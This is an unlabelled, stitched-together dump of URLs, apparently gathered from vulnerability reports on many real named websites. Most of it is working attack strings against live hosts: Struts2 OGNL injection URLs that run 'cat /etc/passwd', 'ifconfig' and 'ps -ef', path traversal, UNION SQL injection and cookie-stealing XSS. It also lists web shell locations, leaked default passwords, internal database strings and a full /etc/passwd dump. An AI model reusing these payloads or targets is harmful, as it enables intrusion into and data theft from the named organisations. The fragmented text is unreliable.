http://admin.xgo.com.cn/api/vote.php?voteid=15 http://shop.skype.tom.com/ http://www.carsing.com.cn/sitemap.html http://zjhlwjc.zjfda.gov.cn/showMessage.action?id=126 http://www.hnea.gov.cn/ http://www.hnea.gov.cn/manage/content/docmanage/download.jsp?filePath=/tzgg/200901/../../../../../../etc/passwd http://121.28.76.6/kpxm/users/userReg.action http://111.1.56.26/admin/loginAction.action http://www.gdaas.cn/indexHome.action http://58.42.233.33:9080/clglWeb/login/login!main.action http://222.223.188.6:81/hegsnj/login.action http://spcs.nfqs.com.cn/login/getpassword.asp http://www.sdwsxy.cn/wsxy/app/Website_goPaper.action?dataSet.id=2c90cbc8 http://sme.sipac.gov.cn/fckeditor/editor/filemanager/connectors/test.html http://59.53.213.186:8666/webgps/login.action http://weishi.baidu.com/feedback/question_7079.html http://weishi.baidu.com/feedback/add http://www.scdzdj.org.cn/news!viewNews.action?id=223 http://www.scgtxxzx.org.cn/为四川国土资源厅网站 http://bbs.youxi.56.com http://miyou.beauty.rayli.com.cn http://miyou.beauty.rayli.com.cn/?s=23 http://adsite3.rayli.com.cn/ http://adsite3.rayli.com.cn/urara/home_shiguang.php?pid=20121112 http://star.rayli.com.cn http://star.rayli.com.cn/services/service.php?m=user&a=shareSelf&width=190&home_uid=4808966 www.handuyishe.com http://www.wooyun.org/bug.php?action=view&id=43 http://www.joinbright.com/inc/ http://www.joinbright.com/inc/Function.asp,爆出如下错误: http://www.joinbright.com/dat/ http://www.jlswtzb.org.cn/jltyzx.action http://www.typhoon.gov.cn/index.php?controller=cms&action=view&pid=133&cid=4230 http://www.typhoon.gov.cn/index.php?controller=users&action=login http://219.143.15.154/webFindNewEducationInfoD.action?eid=4000 http://wap.agrisx.gov.cn/Web/Content/contentPage.action?contentId=12115984 http://www.scfs.gov.cn/article/loadArticleHtml.action http://www.sdaic.gov.cn/sdgsqt/titleQuery.action http://dcp.ha.stats.gov.cn/survey/showSurvey.action www.wnd.gov.cn/zfw/sitePages/channelPages/page.action 
www.lpspsc.gov.cn/indexAction.action?page_css=2 www.wlcbzwfwzx.cn/index/index!list.action http://paipai.speedpay.cn:25024/loginAction_login.do?userType=3查询页面loginAction_login.do测试有戏没有,呵呵呵 http://www.speedpay.cn/dologin.jhtml http://www.jxf.gov.cn/czz!Show.action http://222.240.128.174/front/companyManagerAction%21queryCompanyCondition.action http://en.china-sss.com/fore/exceptionLoginPage.action?redirect:$%7B%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]%7B%27ps%27,%27-ef%27%7D%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29%7D http://www.huijiuwang.com/ http://www.huijiuwang.com/blog/ http://phpweb.oray.com/page/products/?9.html http://whnari.sgepri.sgcc.com.cn/productList.js https://www.dingxindai.com/index.php?plugins&q=imgurl&url=QGltZ3VybEAvY29yZS9jb21tb24uaW5jLnBocA== https://www.dingxindai.com/index.php?plugins&q=imgurl&url=QGltZ3VybEAvLi4vLi4vLi4vZXRjL3Bhc3N3ZA== http://hi.haidilao.com/pages/haidl/find_password.jsp?email=c210cF9hZG1pbkB5ZWFoLm5ldA== http://hi.haidilao.com/pages/haidl/find_password.jsp?email=aHR0cF9hZG1pbkAxNjMuY29t http://www.etongdai.com/index.php?plugins&q=imgurl&url=QGltZ3VybEAvY29yZS9jb21tb24uaW5jLnBocA== http://192.168.1.102/ecshop/upload/user.php?act=profile http://hi.haidilao.com:80/logins/resetPwdByEmail.action?validateinfo=MTM3NTMzMDk4MDAwMHxoZGxAaGFpZGlsYW8uY29t http://hi.haidilao.com/pages/haidl/logins/login.action http://hi.haidilao.com/invitation/queryPost.action http://hi.haidilao.com/mblog/viewfollow.action http://cater.haidilao.com/Cater/toOrderSeatInfo.action site:haidilao.com http://jbjgl.scst.gov.cn/home/show/id/15 http://bbs.zhulong.com/ 
http://bbs.zhulong.com/forum.php?gid=86 http://218.242.57.205:8087/forum.php这论坛用的端口访问,然后就对218.242.57.205做了个端口扫描 http://218.242.57.202:8012/ http://pcab.nlc.gov.cn/xwdt/viewNews.action?id=29001 http://59.151.100.241:5555/ https://www.baopay.com:7443/jsp/baopayManager/login_redirct.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://pubinfo.whjs.gov.cn:8066/frontpage/pubinfo/PubinfoDetail.action?id=1201305271455210007 http://hi.haidilao.com/pages/haidl/order_iframe.jsp?url=aHR0cDovL2NhdGVyLmhhaWRpbGFvLmNvbTo4MC9DYXRlci9vcmRlck1vZGlmeS90b09yZGVyTW9kaWZ5LmFjdGlvbj9vcmRlcklkPVdCSjAyMjAxMzA4MDEwMTY4OCZ0eXBlPTM=#height=1021 http://www.sxjt.gov.cn/sxjt_www2/ http://124.127.49.76:8099/dotproject/ http://www.tyga.gov.cn:17777/xfxt/xjfl.action?name=content&l.lid=20121111222519 http://cds.haidilao.com/jmx-console/ http://cds.haidilao.com/Shell/shell.jsp https://services.cira.ca/agree/mdf/index.action http://dhs.21vianet.com/dhs/pdtype.php?SITE_ID=56&ID=101&NETWORK_ID=0&PMODE_ID=9999&PR=%D3%D0%B2%FA%C8%A8 http://amb.haidilao.com//user!login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://nyj.jl.gov.cn/AgencyView.php?Id=1 
http://hi.haidilao.com/haidl/webmodule/casualBlog.action?content=03FEF79E769FDD189CB08436402A727D62AE5D6443018886&picName=10.png&picSize=45k&picPath=http://hi.haidilao.com:80/upload/2013/8/1/137533877.png%22%20onerror=%22alert%28document.cookie%29%22 http://www.gdcrj.com/gdcrjwsyy/index.do http://hi.haidilao.com/logins/registerJump.action http://127.0.0.1/ecshop/admin/privilege.php?act=add http://hi.haidilao.com http://124.127.49.85:8080/hdlAdmin/account/userLogin.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://124.127.49.85:8080/hdlAdmin/account/userLogin.action?redirect:${%20%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%20%23b%3d%23a.getInputStream%28%29,%20%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%20%23d%3dnew%20java.io.BufferedReader%28%23c%29,%20%23e%3dnew%20char[50000],%23d.read%28%23e%29,%20%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%20%23matt.getWriter%28%29.println%28%23e%29,%20%23matt.getWriter%28%29.flush%28%29,%20%23matt.getWriter%28%29.close%28%29%20 
http://124.127.49.85:8080/hdlAdmin/account/userLogin.action?redirect:${%20%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27ifconfig%27,%27-a%27}%29%29.start%28%29,%20%23b%3d%23a.getInputStream%28%29,%20%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%20%23d%3dnew%20java.io.BufferedReader%28%23c%29,%20%23e%3dnew%20char[50000],%23d.read%28%23e%29,%20%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%20%23matt.getWriter%28%29.println%28%23e%29,%20%23matt.getWriter%28%29.flush%28%29,%20%23matt.getWriter%28%29.close%28%29%20 http://hi.haidilao.com URL:wap.myicetea.linksrewards.com/convert_info.aspx?ex_id=10000000 http://www.minmengsh.gov.cn/oWebsiteFrontArticleContentShow.action http://www.funing.gov.cn/ycapp/nrglIndex.action http://interlibraryloan.utah.gov/ http://erules.rules.utah.gov/ http://www.nncrj.gov.cn/save-reservation.action http://58.218.194.33/xzxxgk/nrglIndex.action http://www2.4008123123.com/phhsios/RegAction/regUser.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D jdbc:jtds:sqlserver://phhsiosdbs:64291;DatabaseName=yumio jdbc:jtds:sqlserver://172.31.202.28;databasename=phhs2new http://www.qqhrczj.gov.cn/default!showNews.action?newsId=217 http://www.ynjst.gov.cn:85/czc/find.action http://www.wh.gov.cn/frontpage/pubinfo/PubinfoDetail.action 
http://www.lvye.com/cooperation/cooperation!toCooperation.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.bafangwang.com/cat.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.bafangwang.com/cat.do http://sso.bafangwang.com/security.action http://bengbu.bafangwang.com/cat.do http://chongqing.bafangwang.com/cat.do http://hangzhou.bafangwang.com/yqlj.do http://jinhua.bafangwang.com/storeDetail.do http://2fwww.bafangwang.com/info_issuance/infoDetail.do http://www.gdsts.org.cn/home.action http://udn.yonyou.com/uc_server/用友开发者家园 http://yunda.yonyou.com/ywlcwbnewsxx.do用友云达信息技术服务有限公司 http://chanjet.yonyou.com/admin.phpNC内部网站 http://store.yonyou.com/admin用友应用商城 http://ucenter.114piaowu.com/datum/personalData/modifyCommPassengersEdit.html?commId=126354 http://ucenter.114piaowu.com/datum/personalData/deleteCommPassengers.html?commId=126354 http://jingdian.114piaowu.com/jqscenic_gotoPwScenicOrder.action http://message.haidilao.com/manage/personalmgr/sys_account_total.aspx http://message.haidilao.com/Template/UpFiles/ http://ucenter.114piaowu.com/orders/scenic/scenicDetailsInfo.html?orderSerialID=19269 http://duizhang.haidilao.com/ http://click.xyx.ali213.net/vote.php?id=35285 
http://ka.cwan.com/extend_taohaody.php?fid=1123779 http://ka.cwan.com/extend_tao.php?aid=566492 http://mentos.renren.com/ http://www.jumpw.com//Cms_Data/Contents/ngw/Media/asp/getcode.asp http://s.96335.com/business/jsp/showAuthorSend.action http://www.hbwzh.com/hbswlyxtweb/communist/Com_add.do http://123.kedou.com/help.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://content.icebox.cn http://pp.icebox.cn http://ssoserver.icebox.cn/toLogin.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.cdzfgjj.gov.cn/jeecms/ArtiSearch.do http://www.cgnpc.com.cn/ http://vc.cgnpc.com.cn:443/V2Conf/jsp/main/mainAction.do http://campus.cgnpc.com.cn:7001/hrrs/Campus/NewsDetail.html http://ocp.icloud.cn/index.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D 
http://appboss.icloud.cn/login.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://demo.jeecms.com/search.jspx?q=%2F%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3Ehello&channelId= http://edu.189.cn/eschool-user-portal/auth/loginPage.do http://www.hrblimin.gov.cn/NewsShow.asp?ArticleID=4236&classid=35 http://goldpen.ccidnet.com/ http://yibao-online.com/user!loginpage.do http://wap.hx168.com.cn/ http://message.haidilao.com/ http://sms.tjftz.gov.cn/ http://sms.ustc.edu.cn/ http://sms.pumch.cn/ http://sms.syswin.com:8081 http://app.focussend.com/sms/Login.aspx‎ http://dx1.lixin.edu.cn http://218.70.8.49:81/msdx/‎ http://dx.21eq.com/ http://bs.jtne.cn/login.aspx http://www.emay.cn/product/duanxin/p_156.htm https://demo.emay.cn/manage/ http://www.hnjt.gov.cn/hjs/queryfullinfo.aspx?id=561&sc=1ed72164-43d5-404a-b60a-7cc9104f7062 http://comic.tom.com/search.php http://comic.tom.com/search.php http://a.xcar.com.cn/cms/insertComment.php?id=1153351 http://meeting.5upay.com/web/index.action http://cx.chinacoop.gov.cn/com_Detail.asp?cid=13772 http://despatchwbep.sf-express.com/wbep/loginmgmt/index.action http://despatchwbep.sf-express.com/wbep/cho.jsp www.google.com超时 http://jingdian.114piaowu.com/SuZhou/cqq_index.jsp?sort=1&file=%2Fdata%2Fmysql%2Fmysql-bin.000002 http://jingdian.114piaowu.com/SuZhou/cqq_index.jsp?sort=1&file=%2Fdata%2Fmysql%2Fmysql-bin.000003 http://jingdian.114piaowu.com/SuZhou/cqq_index.jsp?sort=1&file=%2Fdata%2Fmysql%2Fmysql-bin.000001 http://jingdian.114piaowu.com/SuZhou/cqq_index.jsp?sort=1&file=%2Fdata%2Fmysql%2Fmysql-bin.000004 
http://m.xgo.com.cn/index.php?c=ProList&a=SaleList&lineId=4431 http://kca.kingdee.com/ www.eis100.com http://www.eis100.com/1_.aspx http://www.eis100.com/下编辑器默认实例文件没有删除造成的 http://222.216.4.11:7001/FPApp/index.jsp http://dev.candou.com/login http://dev.candou.com/resetpwd?s=6634ab************f4e1 http://dev.candou.com/resetpwd?s=此处为md5加密后的目标邮箱 http://thqm.wo.com.cn/ http://ipub.cqvip.com/Shop/PackDetail.aspx?id=1FB8D1334B684E9391600E93A6B59629 http://vipblog.cqvip.com/user1/2545585/cmd.asp?uid=2545585&do=labdetail&Lab_lngID=195 http://mechnet.cqvip.com/asp/vipsearch.asp http://2010.cqvip.com/asp/vipsearch.asp http://lib.cqvip.com/zk/search.aspx http://www.cqvip.com/ajax/user.aspx?action=lf&ft=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://ipub.cqvip.com/main/search.aspx?k=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://ipub.cqvip.com/ajax/user.aspx?action=lf&ft=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://club.cqvip.com/showforum.aspx?forumid=654&filter=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://club.cqvip.com/showforum.aspx?search=1&forumid=654&typeid=0&filter=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&order=2 http://oldweb.cqvip.com/loginn.asp?HURL=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://uniondownpaper.cqvip.com/download/login.asp?id=http://oldweb.cqvip.com/loginn.asp?HURL=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://2010.cqvip.com/asp/download.asp?dwNo=&Prev=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Order=&Next=&ZJ=&Flag=&SUID= http://club.cqvip.com/showuser.aspx?orderby=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&ordertype=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&page=2 http://2010.cqvip.com/asp/favorites.asp?title=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://2010.cqvip.com/qk/98592C/target=_blank%20href=http://my.cqvip.com/CustomMagazine.asp?action=modi&gch=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E 
http://bbs.cqvip.com/showtopiclist.aspx?search=1&type=digest&newtopic=600&order=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&direct=&forumid=-1&forums=&page=2 http://oldweb.cqvip.com/asp/SearchZK.asp?T=1&E=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://jd.hshfy.sh.cn/jdfyww/mainpageInfo.action http://wap.sm.gov.cn/index.action http://211.147.214.131:8081/query/index.jsp?sort=1&file=D%3A%5Cmsd_web%5Ctaobao1.4%5Czfb%5CLP00014063396059_order_20130730041245_3258.xml http://114.112.70.45:8000/ http://114.112.82.74/ http://localhost/plt_iservice/service/findFavList.action http://www.cdtdc.com/djqy/login.jsp http://www.cdtdc.com/djqy/index.jsp然后可用默认密码进入,用户名:admin密码:admin http://www.codoon.com/login登陆账号;输入qq邮箱和构造的弱密码123456登陆: http://www.halh.lss.gov.cn/showChaXun_yanglzh.action http://bbs.cqvip.com/ http://xin.cwan.com/ http://data.simuwang.com/dt_company_info.php?id=CO0000008E http://g.baofeng.com/ http://g.baofeng.com/userservice/submitquestion http://g.baofeng.com/admin/login http://bbs.g.baofeng.com/ http://sns.zhulong.com/thread/index?uid=8541403 http://mail.163.com/ http://wap.mail.163.com/ http://www.hbgzcx.com/jtlk/roadinfo/get.do http://218.85.65.28/gzcx/jtlk/traffic_weather.do http://113.240.255.154:8081/jtgzcx/pages/traficgetlist_roadname.action?typename=0 http://211.138.108.116/pages/ http://www.renren.com/Block.do?id=xxxxxx mx://res/options/index.htm,获取设置操作相关的代码就有机会控制浏览器。 mx://res/base/js/ext/mx.config.js mx://res/options/js/all.js http://mm.maxthon.cn/feedback/feedback-list.php?deviceid=xxx&lang=x http://www.a.com/mx.js http://www.a.com/mx.js http://61.128.217.228:8080/CPAtransfer/UserLoginForm!toChinese.action http://shop319293.p14.shopex.cn/ http://shop319100.p24.shopex.cn http://shop319100.p24.shopex.cn/themes/ypgx/weichen.php http://shop319100.p24.shopex.cn/icesword.php http://m.heiyan.com/ http://www.jybus.com.cn http://www.jybus.com.cn/chaxun/config.xml这个文件,配置内容直接显示出来 
www.zhujh.net”作为初始密码,查询了一下,发现这与拿来还是个通用的asp公交车查询系统,是某人在2004年就开发的,在网上搜了一下发现依旧有许多源码下载站提供下载,下载量也不小 http://www.jybus.com.cn/chaxun/admin.asp http://www.dyp2p.com:80/ http://223.202.0.158 http://www.elleshop.com.cn/women.shtml http://passport.elleshop.com.cn/getpassword.aspx### http://passport.elleshop.com.cn/setnewpassword.aspx?token= http://223.202.0.216 http://www.xinbaigo.com/index.html http://nucleartransparency.fas.org http://nucleartransparency.fas.org/map/login.action‎ http://cuta.ruc.edu.cn/admin.php http://psy.ruc.edu.cn/facultyinfo.php?id=14 http://m.heiyan.com/accounts/forget http://m.heiyan.com/accounts/register http://m.heiyan.com/accounts/login http://www.heiyan.com/accounts/agree http://www.51credit.com http://www.51credit.com/shanghu/ucMerchant_showInfo.do http://pop.hb165.com/mail/login.action www.easou.com http://w.easou.com/listsMark.do root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System 
bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin kai:x:501:501::/home/kai:/bin/bash terry:x:502:502::/home/terry:/bin/bash resin:x:505:505::/home/resin:/bin/bash asoon:x:507:507::/home/asoon:/bin/bash http://app.easou.com/ http://pop.bjgwbn.net.cn http://pop.bjgwbn.net.cn/1.rar http://pop.bjgwbn.net.cn/web.rar www.4008267267.com,在订单单页就可以注入了,没有任何过滤。 http://www.joust.cn/cn.aspx http://www.ylmb.gov.cn/phpMyAdmin/index.php?server=1&target=server_variables.php&lang=zh-utf-8&convcharset=gb2312&collation_connection=utf8_unicode_ci&token=ff7543fc5a4abb04cdbdae712995c96 http://116.56.184.3/jmx-console webshell:http://116.56.184.3/myname/index.jsp http://116.56.184.3/edoas2/xitongguanli/anquanguanli/getSecurity http://61.133.219.10/exam/adult/Regist.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.4008267267.com/upload/admin.php http://www.ioscea.ac.cn/login.action 
http://zhaoren.idtag.cn/samename/searchName!searchIndex.htm?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://talk.myfriday.me/tbiaobiao/ http://www.longmaster.com.cn/jobDoc/jobDetail.aspx?positionId=19 qqbrowser://html/error.html#404&指定的网页不存在&http://xxx.qq.com/xxx http://www.qq.com/404/search_children.js http://www.jyb.cn/digg/jsiframe.php?id=160 http://admin.ask.jyb.cn/ask.php?c=49,55,56,62,59,64,63,60,61 http://admin.ask.jyb.cn/Login.php http://gxsjk.jyb.cn/searchLqfs.html?province= http://tieba.baidu.com/f/vote/create?kw=贴吧地址xxxxxxxx http://www.jxcehui.gov.cn/admin/Data/kaliz.aspx http://survey.inewsweek.cn/vote_result.php?vote_id=208 http://survey.inewsweek.cn/ring_result.php?ring_id=243 http://viewpoint.inewsweek.cn/columns/columns_detail.php?id=3149 http://news.inewsweek.cn/news_detail.php?id=49361 http://shequ.inewsweek.cn/FCKeditor/editor/fckeditor.html http://shequ.inewsweek.cn/topics_add_up_file_to_FCK.php http://www.dqjc.com/loadIndex.action,执行任意命令,添加root权限用户pot成功 zsc:x:0:0::/home/zsc:/bin/bash LSpqSy1JMZq54K47yDLEt1:14224:0:99999:7 http://blog.csdn.net/llbbzh/article/details/9736979) http://write.blog.csdn.net/feedback) http://baozoumanhua.com/ http://csm.happigo.com/happigo/loginAction!linkLogin.action?empId=900083&key=237da08b6a25fee673ee5ce129d25319 http://www.xxx.com/index.php?igo=be,admin,login http://www.t3pay.cn/shell.jsp http://epos.t3pay.cn/shell.jsp http://sms.tom.com/pk12530/ub/news_admin/index.php?id=18 http://m.tom.cn/appweb/book/xiazai.jsp?s=116 http://www.nmggbzzxx.com/ http://www.nmggbzzxx.com/kccd_list.aspx?id=11 
http://event.ftms.com.cn/box.php?id=-226%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,user%28%29,17,18,19,20,21,22,23,24,25,26,27,28 http://221.215.38.132:8099/wssb/xgxz/list.action http://221.215.38.132:8099/wssb/xgxz/list.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://221.215.38.132:8099/wssb/xgxz/list.action?redirect:${%20%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%20%23b%3d%23a.getInputStream%28%29,%20%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%20%23d%3dnew%20java.io.BufferedReader%28%23c%29,%20%23e%3dnew%20char[50000],%23d.read%28%23e%29,%20%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%20%23matt.getWriter%28%29.println%28%23e%29,%20%23matt.getWriter%28%29.flush%28%29,%20%23matt.getWriter%28%29.close%28%29%20 http://221.215.38.132:8099/wssb/xgxz/list.action?redirect:${%20%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27ifconfig%27,%27-a%27}%29%29.start%28%29,%20%23b%3d%23a.getInputStream%28%29,%20%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%20%23d%3dnew%20java.io.BufferedReader%28%23c%29,%20%23e%3dnew%20char[50000],%23d.read%28%23e%29,%20%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%20%23matt.getWriter%28%29.println%28%23e%29,%20%23matt.getWriter%28%29.flush%28%29,%20%23matt.getWriter%28%29.close%28%29%20 